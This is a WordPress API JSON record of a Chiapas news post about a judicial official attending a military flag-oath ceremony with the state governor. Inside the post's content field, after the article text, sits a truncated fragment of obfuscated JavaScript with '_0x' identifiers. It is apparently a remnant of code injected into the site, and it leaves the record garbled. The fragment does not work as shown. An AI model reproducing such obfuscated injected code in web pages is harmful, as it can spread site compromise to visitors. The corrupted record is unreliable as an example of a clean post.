{"id":21761,"date":"2025-05-06T03:19:20","date_gmt":"2025-05-06T03:19:20","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21761"},"modified":"2025-05-06T03:19:21","modified_gmt":"2025-05-06T03:19:21","slug":"juventud-chiapaneca-comprometida-con-la-patria-por-la-construccion-de-paz-en-chiapas-moreno-guillen","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21761","title":{"rendered":"Juventud chiapaneca comprometida con la patria por la construcci\u00f3n de paz en Chiapas: Moreno Guill\u00e9n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"717\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-1024x717.jpg\" alt=\"\" class=\"wp-image-21762\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-1024x717.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-300x210.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-768x537.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-1536x1075.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/IMG-20250505-WA0044-2048x1433.jpg 2048w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>5 de mayo del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, acudi\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, a la Ceremonia de Toma de Protesta de Bandera de los Soldados del Servicio Militar Nacional Clase 2006, llevada a cabo en las instalaciones del 3er. Regimiento de Artiller\u00eda, El Sabino.<\/p>\n\n\n\n<p>Este acto c\u00edvico, manifest\u00f3 Moreno Guill\u00e9n, representa el compromiso de la juventud chiapaneca con los valores de lealtad, disciplina y amor a la patria, pilares fundamentales para la construcci\u00f3n y el mantenimiento de la paz, justicia y responsabilidad ciudadana en la entidad.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3n. 5 de mayo del 2025. El magistrado presidente del Poder Judicial del Estado de Chiapas, Juan Carlos Moreno Guill\u00e9n, acudi\u00f3 junto al gobernador del estado, Eduardo Ram\u00edrez Aguilar, a la Ceremonia de Toma de Protesta de Bandera de los Soldados del Servicio Militar Nacional Clase 2006, llevada a cabo en las instalaciones del 3er. &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21762,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-21761","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21761","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21761"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21761\/revisions"}],"predecessor-version":[{"id":21763,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21761\/revisions\/21763"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21762"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21761"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21761"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21761"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}